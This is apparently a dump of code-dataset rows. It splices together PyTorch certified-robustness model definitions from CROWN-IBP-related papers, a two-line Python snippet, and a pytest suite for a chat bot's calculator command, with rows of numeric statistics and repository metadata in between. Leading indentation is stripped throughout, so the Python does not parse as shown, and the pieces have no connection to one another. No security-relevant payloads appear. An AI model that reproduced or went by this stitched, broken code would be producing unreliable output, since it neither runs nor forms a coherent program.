############### Models from CROWN-IBP paper (Zhang et al. 2020) ###################
def crown_ibp_model_a_b(in_ch=3, in_dim=32, width=2, linear_size=256):
model = nn.Sequential(
nn.Conv2d(in_ch, 4*width, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(4*width, 8*width, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(8*width*(in_dim // 4)*(in_dim // 4),linear_size),
nn.ReLU(),
nn.Linear(linear_size, 10)
)
return model
def crown_ibp_model_c_d_e_f(in_ch=3, in_dim=32, kernel_size=3, width=2, linear_size=64):
if linear_size is None:
linear_size = width * 64
if kernel_size == 5:
h = (in_dim - 4) // 4
elif kernel_size == 3:
h = in_dim // 4
else:
raise ValueError("Unsupported kernel size")
model = nn.Sequential(
nn.Conv2d(in_ch, 4*width, kernel_size=kernel_size, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(4*width, 8*width, kernel_size=kernel_size, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(8*width, 8*width, kernel_size=4, stride=4, padding=0),
nn.ReLU(),
Flatten(),
nn.Linear(8*width*h*h, linear_size),
nn.ReLU(),
nn.Linear(linear_size, 10)
)
return model
def crown_ibp_model_g_h_i_j(in_ch=3, in_dim=32, width=1, linear_size=256):
model = nn.Sequential(
nn.Conv2d(in_ch, 4*width, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(4*width, 4*width, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(4*width, 8*width, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(8*width, 8*width, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(8*width*(in_dim // 4)*(in_dim // 4),linear_size),
nn.ReLU(),
nn.Linear(linear_size,linear_size),
nn.ReLU(),
nn.Linear(linear_size,10)
)
return model
def crown_ibp_dm_large(in_ch, in_dim, linear_size=512):
model = nn.Sequential(
nn.Conv2d(in_ch, 64, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(64, 64, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(64, 128, 3, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(128, 128, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(128, 128, 3, stride=1, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear((in_dim//2) * (in_dim//2) * 128, linear_size),
nn.ReLU(),
nn.Linear(linear_size,10)
)
return model
############### Models from auto_LiRPA paper (Xu et al. 2020) ###################
def crown_ibp_dm_large_bn(in_ch=3, in_dim=32, width=64, linear_size=512):
"""The same as the DM-large model but with batch normalization layers."""
model = nn.Sequential(
nn.Conv2d(in_ch, width, 3, stride=1, padding=1),
nn.BatchNorm2d(width),
nn.ReLU(),
nn.Conv2d(width, width, 3, stride=1, padding=1),
nn.BatchNorm2d(width),
nn.ReLU(),
nn.Conv2d(width, 2 * width, 3, stride=2, padding=1),
nn.BatchNorm2d(2 * width),
nn.ReLU(),
nn.Conv2d(2 * width, 2 * width, 3, stride=1, padding=1),
nn.BatchNorm2d(2 * width),
nn.ReLU(),
nn.Conv2d(2 * width, 2 * width, 3, stride=1, padding=1),
nn.BatchNorm2d(2 * width),
nn.ReLU(),
Flatten(),
nn.Linear((in_dim//2) * (in_dim//2) * 2 * width, linear_size),
nn.ReLU(),
nn.Linear(linear_size,10)
)
return model
############# Models from IBP with short warmup (Shi et al. 2021) ####################
def crown_ibp_dm_large_bn_full(in_ch=3, in_dim=32, width=64, linear_size=512, num_class=10):
model = nn.Sequential(
nn.Conv2d(in_ch, width, 3, stride=1, padding=1),
nn.BatchNorm2d(width),
nn.ReLU(),
nn.Conv2d(width, width, 3, stride=1, padding=1),
nn.BatchNorm2d(width),
nn.ReLU(),
nn.Conv2d(width, 2 * width, 3, stride=2, padding=1),
nn.BatchNorm2d(2 * width),
nn.ReLU(),
nn.Conv2d(2 * width, 2 * width, 3, stride=1, padding=1),
nn.BatchNorm2d(2 * width),
nn.ReLU(),
nn.Conv2d(2 * width, 2 * width, 3, stride=1, padding=1),
nn.BatchNorm2d(2 * width),
nn.ReLU(),
Flatten(),
nn.Linear((in_dim//2) * (in_dim//2) * 2 * width, linear_size),
nn.BatchNorm1d(linear_size),
nn.ReLU(),
nn.Linear(linear_size,num_class)
)
return model
| 29.376409 | 101 | 0.522506 | 5,188 | 39,100 | 3.827101 | 0.054549 | 0.062554 | 0.070511 | 0.083203 | 0.855301 | 0.842609 | 0.82624 | 0.794208 | 0.770536 | 0.756535 | 0 | 0.086068 | 0.319514 | 39,100 | 1,330 | 102 | 29.398496 | 0.660165 | 0.053862 | 0 | 0.70696 | 0 | 0 | 0.012632 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086996 | false | 0 | 0.00641 | 0.033883 | 0.18315 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
60fff778b1caf2182c4ab818d8ca823f7aa5674d | 32 | py | Python | PyCharm/Primer_12.py | tamaranesterenko/-Python.LR_10 | 57feefb1e33c64dbd9c46fe17cef9cf363c6d17b | [
"MIT"
] | null | null | null | PyCharm/Primer_12.py | tamaranesterenko/-Python.LR_10 | 57feefb1e33c64dbd9c46fe17cef9cf363c6d17b | [
"MIT"
] | null | null | null | PyCharm/Primer_12.py | tamaranesterenko/-Python.LR_10 | 57feefb1e33c64dbd9c46fe17cef9cf363c6d17b | [
"MIT"
] | null | null | null | a = {0, 1, 12, 3, 2}
print(a)
| 10.666667 | 21 | 0.40625 | 8 | 32 | 1.625 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.272727 | 0.3125 | 32 | 2 | 22 | 16 | 0.318182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
880e233950b1dffb0f8ac1a363f56d46d14f086e | 29,947 | py | Python | hallo/test/modules/math/test_calculate.py | SpangleLabs/Hallo | 17145d8f76552ecd4cbc5caef8924bd2cf0cbf24 | [
"MIT"
] | 1 | 2022-01-27T13:25:01.000Z | 2022-01-27T13:25:01.000Z | hallo/test/modules/math/test_calculate.py | joshcoales/Hallo | 17145d8f76552ecd4cbc5caef8924bd2cf0cbf24 | [
"MIT"
] | 75 | 2015-09-26T18:07:18.000Z | 2022-01-04T07:15:11.000Z | hallo/test/modules/math/test_calculate.py | SpangleLabs/Hallo | 17145d8f76552ecd4cbc5caef8924bd2cf0cbf24 | [
"MIT"
] | 1 | 2021-04-10T12:02:47.000Z | 2021-04-10T12:02:47.000Z | from hallo.events import EventMessage
def test_calc_simple(hallo_getter):
    """Simple integer addition is evaluated correctly."""
    hallo = hallo_getter({"math"})
    message = EventMessage(hallo.test_server, None, hallo.test_user, "calc 2+2")
    hallo.function_dispatcher.dispatch(message)
    replies = hallo.test_server.get_send_data(1, hallo.test_user, EventMessage)
    assert replies[0].text == "4", "2+2 != 4"
def test_calc_multiply(hallo_getter):
    """Integer multiplication is evaluated correctly."""
    hallo = hallo_getter({"math"})
    message = EventMessage(hallo.test_server, None, hallo.test_user, "calc 21*56")
    hallo.function_dispatcher.dispatch(message)
    replies = hallo.test_server.get_send_data(1, hallo.test_user, EventMessage)
    assert replies[0].text == "1176", "21*56 != 1176"
def test_calc_divide(hallo_getter):
    """Division producing a non-integer result is evaluated correctly."""
    hallo = hallo_getter({"math"})
    message = EventMessage(hallo.test_server, None, hallo.test_user, "calc 1/5")
    hallo.function_dispatcher.dispatch(message)
    replies = hallo.test_server.get_send_data(1, hallo.test_user, EventMessage)
    assert replies[0].text == "0.2", "1/5 != 0.2"
def test_calc_subtract(hallo_getter):
    """Subtraction producing a negative result is evaluated correctly."""
    hallo = hallo_getter({"math"})
    message = EventMessage(hallo.test_server, None, hallo.test_user, "calc 13-17")
    hallo.function_dispatcher.dispatch(message)
    replies = hallo.test_server.get_send_data(1, hallo.test_user, EventMessage)
    assert replies[0].text == "-4", "13-17 != -4"
def test_calc_div_zero(hallo_getter):
    """Division by zero responds with an error that names the problem."""
    hallo = hallo_getter({"math"})
    message = EventMessage(hallo.test_server, None, hallo.test_user, "calc 1/0")
    hallo.function_dispatcher.dispatch(message)
    reply_text = hallo.test_server.get_send_data(1, hallo.test_user, EventMessage)[0].text
    assert "error" in reply_text.lower(), "division by zero should fail"
    assert (
        "no division by zero" in reply_text
    ), "division by zero response did no specify problem"
def test_cos(hallo_getter):
    """cos() at the key angles 0, pi/2 and pi returns the expected values."""
    hallo = hallo_getter({"math"})

    def calc(expression):
        # Dispatch a calc command and return the text of the single reply.
        hallo.function_dispatcher.dispatch(
            EventMessage(hallo.test_server, None, hallo.test_user, "calc " + expression)
        )
        return hallo.test_server.get_send_data(1, hallo.test_user, EventMessage)[0].text

    assert 1 == float(calc("cos(0)")), "cos(0) != 1"
    assert 0 == float(calc("cos(pi/2)")), "cos(pi/2) != 0"
    assert -1 == float(calc("cos(pi)")), "cos(pi) != -1"
def test_sin(hallo_getter):
    """sin() at the key angles 0, pi/2 and pi returns the expected values."""
    test_hallo = hallo_getter({"math"})

    def calc(expression):
        # Dispatch a calc command and return the text of the single reply.
        test_hallo.function_dispatcher.dispatch(
            EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc " + expression)
        )
        return test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)[0].text

    assert 0 == float(calc("sin(0)")), "sin(0) != 0"
    # Fixed assertion message: the check is for sin(pi/2) == 1, but the
    # original failure text incorrectly read "sin(pi/2) != 0".
    assert 1 == float(calc("sin(pi/2)")), "sin(pi/2) != 1"
    assert 0 == float(calc("sin(pi)")), "sin(pi) != 0"
def test_order_of_operations(hallo_getter):
    """Mixed expressions follow standard operator precedence and bracketing."""
    hallo = hallo_getter({"math"})

    def calc(expression):
        # Dispatch a calc command and return the text of the single reply.
        hallo.function_dispatcher.dispatch(
            EventMessage(hallo.test_server, None, hallo.test_user, "calc " + expression)
        )
        return hallo.test_server.get_send_data(1, hallo.test_user, EventMessage)[0].text

    assert 62 == float(calc("6+7*8")), "6+7*8 != 62"
    assert 0 == float(calc("16/8-2")), "16/8-2 != 0"
    assert 13 == float(calc("9-5/(8-3)*2+6")), "9-5/(8-3)*2+6 != 13"
    assert 0 == float(calc("150/(6+3*8)-5")), " 150/(6+3*8)-5 != 0"
def test_brackets(hallo_getter):
    """Brackets group correctly, support implicit multiplication, and
    unbalanced or empty brackets produce errors."""
    hallo = hallo_getter({"math"})

    def calc(expression):
        # Dispatch a calc command and return the text of the single reply.
        hallo.function_dispatcher.dispatch(
            EventMessage(hallo.test_server, None, hallo.test_user, "calc " + expression)
        )
        return hallo.test_server.get_send_data(1, hallo.test_user, EventMessage)[0].text

    # Well-formed bracketed expressions.
    assert 42 == float(calc("(25-11)*3")), "(25-11)*3 != 42"
    assert 13 == float(calc("4+(-1(-2-1))^2")), "4+(-1(-2-1))^2 != 13"
    assert 14 == float(calc("2(3+4)")), "2(3+4) != 14"
    assert 21 == float(calc("(3+4)3")), "(3+4)3 != 21"
    # Malformed bracket usage should all report an error.
    assert "error" in calc("(((17*3)").lower(), "(((17*3) should fail"
    assert "error" in calc("(21/3))+2))*5").lower(), "(21/3))+2))*5 should fail"
    assert "error" in calc("((15*(3))())").lower(), "((15*(3))()) should fail"
    # More well-formed cases, including implicit multiplication by constants.
    assert -4 == float(calc("(3)-(7)")), "(3)-(7) != -4"
    assert 59.778 == float(calc("e(3+4)pi")[:6]), "e(3+4)pi != 59.778"
    assert 0.7 == round(float(calc("cos(acos(0.7))")), 5), "cos(acos(0.7)) != 0.7"
def test_pi(hallo_getter):
    """The constant pi evaluates to approximately 3.141."""
    hallo = hallo_getter({"math"})
    message = EventMessage(hallo.test_server, None, hallo.test_user, "calc pi")
    hallo.function_dispatcher.dispatch(message)
    replies = hallo.test_server.get_send_data(1, hallo.test_user, EventMessage)
    assert "3.141" == replies[0].text[:5], "pi != 3.141"
def test_e(hallo_getter):
    """The constant e evaluates to approximately 2.718."""
    hallo = hallo_getter({"math"})
    message = EventMessage(hallo.test_server, None, hallo.test_user, "calc e")
    hallo.function_dispatcher.dispatch(message)
    replies = hallo.test_server.get_send_data(1, hallo.test_user, EventMessage)
    assert "2.718" == replies[0].text[:5], "e != 2.718"
def test_tan(hallo_getter):
    """tan() is 0 at 0 and pi, and very large near the pi/2 asymptote."""
    hallo = hallo_getter({"math"})

    def calc(expression):
        # Dispatch a calc command and return the text of the single reply.
        hallo.function_dispatcher.dispatch(
            EventMessage(hallo.test_server, None, hallo.test_user, "calc " + expression)
        )
        return hallo.test_server.get_send_data(1, hallo.test_user, EventMessage)[0].text

    assert 0 == float(calc("tan(0)")), "tan(0) != 0"
    assert 0 == float(calc("tan(pi)")), "tan(pi) != 0"
    # tan(pi/2) is undefined; with a finite pi approximation it should just
    # come out enormous.
    assert 10 ** 6 < abs(float(calc("tan(pi/2)"))), "abs(tan(pi/2)) < 1,000,000"
def test_acos(hallo_getter):
    """acos() returns expected values on [-1, 1] and errors outside it."""
    test_hallo = hallo_getter({"math"})

    def calc(expression):
        # Dispatch a calc command and return the text of the single reply.
        test_hallo.function_dispatcher.dispatch(
            EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc " + expression)
        )
        return test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)[0].text

    assert 0 == float(calc("acos(1)")), "acos(1) != 0"
    assert "1.570" == calc("acos(0)")[:5], "acos(0) != pi/2"
    assert "3.141" == calc("acos(-1)")[:5], "acos(-1) != pi"
    # Out-of-domain input must produce an error. Fixed: lower-case the reply
    # before checking, consistent with every other error assertion in this file.
    assert "error" in calc("acos(2)").lower(), "acos(2) should fail"
def test_asin(hallo_getter):
    """asin() returns expected values on [-1, 1] and errors outside it."""
    test_hallo = hallo_getter({"math"})

    def calc(expression):
        # Dispatch a calc command and return the text of the single reply.
        test_hallo.function_dispatcher.dispatch(
            EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc " + expression)
        )
        return test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)[0].text

    assert 0 == float(calc("asin(0)")), "asin(0) != 0"
    assert 1.5707 == float(calc("asin(1)")[:6]), "asin(1) != pi/2"
    assert -1.5707 == float(calc("asin(-1)")[:7]), "asin(-1) != -pi/2"
    # Out-of-domain input must produce an error. Fixed: lower-case the reply
    # before checking, consistent with every other error assertion in this file.
    assert "error" in calc("asin(2)").lower(), "asin(2) should fail"
def test_atan(hallo_getter):
    """atan() returns expected values and tends to pi/2 for large input."""
    hallo = hallo_getter({"math"})

    def calc(expression):
        # Dispatch a calc command and return the text of the single reply.
        hallo.function_dispatcher.dispatch(
            EventMessage(hallo.test_server, None, hallo.test_user, "calc " + expression)
        )
        return hallo.test_server.get_send_data(1, hallo.test_user, EventMessage)[0].text

    assert 0 == float(calc("atan(0)")), "atan(0) != 0"
    assert 0.785 == float(calc("atan(1)")[:5]), "atan(1) != pi/4"
    assert -0.785 == float(calc("atan(-1)")[:6]), "atan(-1) != -pi/4"
    assert 1.5707 == float(calc("atan(1000000)")[:6]), "atan(1000000) != pi/2"
def test_sqrt(hallo_getter):
    """sqrt() handles perfect squares, irrationals, decimals, and rejects
    negative input."""
    hallo = hallo_getter({"math"})

    def calc(expression):
        # Dispatch a calc command and return the text of the single reply.
        hallo.function_dispatcher.dispatch(
            EventMessage(hallo.test_server, None, hallo.test_user, "calc " + expression)
        )
        return hallo.test_server.get_send_data(1, hallo.test_user, EventMessage)[0].text

    assert 2 == float(calc("sqrt(4)")), "sqrt(4) != 2"
    assert "1.414" == calc("sqrt(2)")[:5], "sqrt(2) != 1.414"
    assert 1 == float(calc("sqrt(1)")), "sqrt(1) != 1"
    assert 1.5 == float(calc("sqrt(2.25)")), "sqrt(2.25) != 1.5"
    # No complex-number support, so a negative radicand must error.
    assert "error" in calc("sqrt(-1)").lower(), "negative root should fail"
def test_power(hallo_getter):
    """Exponentiation works with ^ and **, with negative, fractional and
    zero exponents."""
    hallo = hallo_getter({"math"})

    def calc(expression):
        # Dispatch a calc command and return the text of the single reply.
        hallo.function_dispatcher.dispatch(
            EventMessage(hallo.test_server, None, hallo.test_user, "calc " + expression)
        )
        return hallo.test_server.get_send_data(1, hallo.test_user, EventMessage)[0].text

    assert 4 == float(calc("2^2")), "2^2 != 4"
    assert 4 == float(calc("2**2")), "** should work alongside ^"
    assert 0.5 == float(calc("2^-1")), "2^-1 != 1/2"
    assert 1.414 == float(calc("2^0.5")[:5]), "2^0.5 != 1.414"
    assert 1 == float(calc("2^0")), "2^0 != 1"
def test_hyperbolics(hallo_getter):
test_hallo = hallo_getter({"math"})
# Cosh
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc cosh(0)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 1 == float(data[0].text), "cosh(0) != 1"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc cosh(1)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 1.543 == float(data[0].text[:5]), "cosh(1) != 1.543"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc cosh(-1)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 1.543 == float(data[0].text[:5]), "cosh(-1) != 1.543"
# Sinh
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc sinh(0)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 0 == float(data[0].text), "sinh(0) != 0"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc sinh(1)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 1.175 == float(data[0].text[:5]), "sinh(1) != 1.175"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc sinh(-1)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert -1.175 == float(data[0].text[:6]), "sinh(-1) != -1.175"
# Tanh
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc tanh(0)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 0 == float(data[0].text), "tanh(0) != 0"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc tanh(1)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 0.761 == float(data[0].text[:5]), "tanh(1) != 0.761"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc tanh(-1)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert -0.761 == float(data[0].text[:6]), "tanh(-1) != -0.761"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc tanh(1000000)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 1 == float(data[0].text), "tanh(1000000) != 1"
# Acosh
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc acosh(0)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert "error" in data[0].text.lower(), "acosh(0) should fail"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc acosh(1)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 0 == float(data[0].text), "acosh(1) != 0"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc acosh(4)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 2.063 == float(data[0].text[:5]), "acosh(4) != 2.063"
# Asinh
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc asinh(0)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 0 == float(data[0].text), "asinh(0) != 0"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc asinh(1)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 0.881 == float(data[0].text[:5]), "asinh(1) != 0.881"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc asinh(-1)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert -0.881 == float(data[0].text[:6]), "asinh(-1) != -0.881"
# Atanh
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc atanh(0)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 0 == float(data[0].text), "atanh(0) != 0"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc atanh(0.5)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 0.549 == float(data[0].text[:5]), "atanh(0.5) != 0.549"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc atanh(-0.5)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert -0.549 == float(data[0].text[:6]), "atanh(-0.5) != -0.549"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc atanh(1)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert "error" in data[0].text.lower(), "atanh(1) should fail"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc atanh(2)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert "error" in data[0].text.lower(), "atanh(2) should fail"
def test_gamma(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc gamma(1)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 1 == float(data[0].text), "gamma(1) != 1"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc gamma(5)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 24 == float(data[0].text), "gamma(5) != 24"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc gamma(0)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert "error" in data[0].text, "gamma(0) should fail"
def test_passive(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch_passive(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "25")
)
data = test_hallo.test_server.get_send_data(0)
assert len(data) == 0, "No response should have happened."
test_hallo.function_dispatcher.dispatch_passive(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "23.47")
)
data = test_hallo.test_server.get_send_data(0)
assert len(data) == 0, "No response should have happened."
test_hallo.function_dispatcher.dispatch_passive(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "2+2")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert data[0].text == "4", "2+2 = 4, hallo should have responded"
test_hallo.function_dispatcher.dispatch_passive(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "pie")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert 8.539 == float(data[0].text[:5]), "Response should have been received."
evt_msg = EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"cos(acos(sin(asin(tan(atan(acosh(cosh(sinh(asinh(tanh(atanh(0))))))))))))",
)
test_hallo.function_dispatcher.dispatch_passive(evt_msg)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert len(data) != 0, "Response should have been received."
test_hallo.function_dispatcher.dispatch_passive(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "acos(2)")
)
data = test_hallo.test_server.get_send_data(0)
assert len(data) == 0, "No response should have been received"
test_hallo.function_dispatcher.dispatch_passive(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, " 97")
)
data = test_hallo.test_server.get_send_data(0)
assert len(data) == 0, "No response should have been received"
test_hallo.function_dispatcher.dispatch_passive(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "9 7")
)
data = test_hallo.test_server.get_send_data(0)
assert len(data) == 0, "No response should have been received"
def test_passive_ip_error(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch_passive(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "127.0.0.1")
)
data = test_hallo.test_server.get_send_data(0)
assert len(data) == 0, "No response should have happened."
def test_ee(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc ee")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert data[0].text != "0", "Improper processing of constants."
assert data[0].text[:5] == "7.389", "Incorrect answer produced by e*e calculation."
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc pipi")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert data[0].text != "0", "Improper processing of constants."
assert (
data[0].text[:5] == "9.869"
), "Incorrect answer produced by pi*pi calculation."
def test_equals(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc 2+2=4")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert "4=4" in data[0].text, "Answer was not correctly found."
assert "not right" not in data[0].text, "This calculation (2+2=4) is right."
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc 2+2=5")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert "4=5" in data[0].text, "Answer was not correctly calculated."
assert "not right" in data[0].text, "This calculation (2+2=5) is not right."
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc pi=acos(-1)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert "3.141" in data[0].text, "Pi should be in response."
assert "=3.141" in data[0].text, "Answer should be pi."
assert "not right" not in data[0].text, "This calculation (pi=acos(-1)) is right."
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc circle constant=pi")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert "3.141" in data[0].text, "Pi should have been evaluated."
assert (
"circle constant=3.141" in data[0].text
), "Text should have been left unchanged."
assert "not right" not in data[0].text, "Numbers are not incorrect here."
assert "no calculation" not in data[0].text, "There is a calculation here."
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc hello=goodbye")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert "hello=goodbye" in data[0].text, "Text should not be changed."
assert "no calculation" in data[0].text, "There is no calculation here."
assert (
"not right" not in data[0].text
), "Should not say a user's non-calculation text is not right."
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc x=2+2=y=5")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert "x=4=y=5" in data[0].text, "Calculation should have been parsed and ran."
assert "no calculation" not in data[0].text, "There is a calculation here."
assert (
"not right" in data[0].text
), "Not all numbers here are the same, they are not equal."
| 50.500843 | 101 | 0.711557 | 4,463 | 29,947 | 4.497871 | 0.038763 | 0.220136 | 0.242851 | 0.176049 | 0.930059 | 0.911179 | 0.904503 | 0.899771 | 0.892299 | 0.891203 | 0 | 0.034261 | 0.154974 | 29,947 | 592 | 102 | 50.586149 | 0.75899 | 0.001069 | 0 | 0.416667 | 0 | 0.001852 | 0.12826 | 0.002441 | 0 | 0 | 0 | 0 | 0.198148 | 1 | 0.042593 | false | 0.02037 | 0.001852 | 0 | 0.044444 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
